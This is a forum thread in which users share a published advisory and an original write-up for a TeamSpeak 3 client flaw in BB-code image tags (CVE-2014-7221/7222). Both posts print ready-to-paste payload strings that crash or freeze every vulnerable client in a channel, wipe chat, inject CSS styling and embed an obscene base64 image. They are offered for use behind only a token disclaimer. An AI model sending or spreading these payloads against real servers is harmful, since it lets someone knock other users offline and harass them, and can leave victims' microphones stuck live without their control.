TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability

Ninja_Villain

Member
May 11, 2015
24
39
45
Found this funny.... Just typed "Teamspeak vulnerabilities" into google hoping to get a list like microsoft does on their update site.... and I found this....
Code:
#################################################################################################
#
# Title                   : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability
# Severity                : High+/Critical
# Reporter(s)             : SpyEye & Christian Galeone
# Software Version        : 3.0.14 & Previous Versions
# Software Name           : TeamSpeak Client
# Software Download Link  : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe
# Vendor Home             : http://teamspeak.com/
# Date(s)                 : 01/04/2014 - 0r161n4l c0d3 By SpyEye
#                         : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone
# Tested in               : Win7 - TeamSpeak Client V3.0.14
# CVE(s)                  : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone
#
##################################################################################################
# 
# Effects:
# 
# Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel)
# 
# Note:
#
# The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect. 
#
# PoC:
#  
#  1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye
#
#  CVE: CVE-2014-7221
#
# [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img]
# 
#  2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone
#
#  CVE: CVE-2014-7222
# 
# [img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img][img][img]\\14\z[/img][/img][img][img]\\15\z[/img][/img][img][img]\\16\z[/img][/img][img][img]\\17\z[/img][/img][img][img]\\18\z[/img][/img][img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img]
# 
# Fix:
#
# http://screech.me/ts3/plugins/antifreeze.html
#
#                    OR
#
# http://www.teamspeak.com/?page=downloads
#
# Original Source:
#
# http://r4p3.net/public/ts3bbcodefreeze.txt
#
# http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/
#
# Credit(s):
#
# SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r
#
# Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r
#
#
##################################################################################################


Glad to see that r4p3 is everywhere. And getting its credit.....
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
I just put http://r4p3.net/public/ts3bbcodefreeze.txt back up. :cool:

Code:
TITLE: TeamSpeak 3 BB Code [IMG] Exploit
PUBLISH DATE: April 01, 2014
AUTHOR: Asphyxia

SUMMARY: TeamSpeak 3 allows for [IMG] BB Code in server, channel and private messages on accident. This is NOT intended.

EFFECT: TeamSpeak 3 can be crashed (.14) tested on Windows 7 or temporarily frozen (<.14) on Windows, chats can be forcefully cleared from view and some CSS can even be included to make for a rainbow, german flag and etc. You can also include base64 image data to show small custom icons such as a dildo/penis (tested). Local images can be embedded in the chat also. While voice functionality remains for people with voice activation set nothing else works, key binds will not work and people frozen while talking and holding their key bind will remain with a "hot mic" or active microphone and they can't do anything about it except unplug their microphone or kill TeamSpeak.

[THE FOLLOWING IS STRICTLY FOR DEVELOPMENT AND PROFESSIONAL USAGE, ABUSING THE FOLLOWING INFORMATION IS SOLELY YOUR RESPONSIBILITY AND IS NOT RECOMMENDED]
EXPLOIT EXAMPLES:

#####CLEARING OR WIPING OUT THE CHAT#####
[img][img]" width="99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" height="99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999[/img][/img]

#####USING TITLES ON IMAGES (hover mouse and you will see "YES")#####
[url=#][img][img]" width="50" height="50" title="YES" style="background-color:black;[/img][/img][/url]

#####CRASH AND FREEZE (You just need a working link with // in front of it, sources do not matter)#####
[img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img]

#####RAINBOW FLAG#####
[img][img]" width="99999" height="10" style="background-color:red;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:orange;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:yellow;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:green;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:blue;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:indigo;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:violet;[/img][/img]

#####GERMAN FLAG#####
[img][img]" width="99999" height="10" style="background-color:black;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:red;[/img][/img]
[img][img]" width="99999" height="10" style="background-color:gold;[/img][/img]

#####IRISH FLAG#####
[img][img]" width="40" height="99999" style="background-color:green;[/img][/img][img][img]" width="40" height="0" style="background-color:white;[/img][/img][img][img]" width="40" height="99999" style="background-color:orange;[/img][/img]

#####BIG BLACK BOX (You can use hex colors like #FF0000 instead of color names)#####
[img][img]" width="9999999" height="9999999" style="background-color:black;[/img][/img]

#####BASE64 IMAGE (black and white sketched penis)#####
[img][img]data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAANAA0DASIAAhEBAxEB/8QAFQABAQAAAAAAAAAAAAAAAAAABwb/xAAkEAACAgEDAwUBAAAAAAAAAAABAgMEBQYRIhIUIQAHEyMxYv/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCv9wcWclkdR3Tenhkwun47lMJHC/xyk2iXVpEZo2+pOUZRuI87quyh6E8zr2HSWe1hiJMDUyL1E7y/ZnYB78M0iBIG4nYRraVQWLjpiKhV6uKZofnovF2BxjtRd3FEPyvHKTIkK/zGrrGNgBsg2AHgB//Z[/img][/img]

#####BASE64 CARROT#####
[img][img]data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAOwwAADsMBx2+oZAAAAPdJREFUOMuVU7GuwjAMvLTUKB1Q3tObWfjLTkVCWfhGkGBiQoGhqAZkhqqQlETti2RFcXxn+5yAmTFmeV2Kv/s2w8jS1kjqfKucysYIbpVTMV/vHyWIgf0qFDNHA4lIAICZ1bCNPru2RmYpsGyAfVOAiCSvy6QuWQrsTsDv9Y5dVeBZN1FdvkQkInnYEu708Q1JfFG1NfLWoAfnTRfoXFjZeVFgZe9g5mAqySkYM20qWSz7kOS8KJIE7ynk/AfgGFxya1Bq4Md2/QzLBwAFQKRefjyPI7jtUs+3aeBXBQBwEQXdmknAgOAiXZxZHyYDg6fsP9v//o0XqeGrV7rZKZIAAAAHdElNRQfcBhgLIgQfT5H8AAAAAElFTkSuQmCC[/img][/img]
 
Last edited:
Top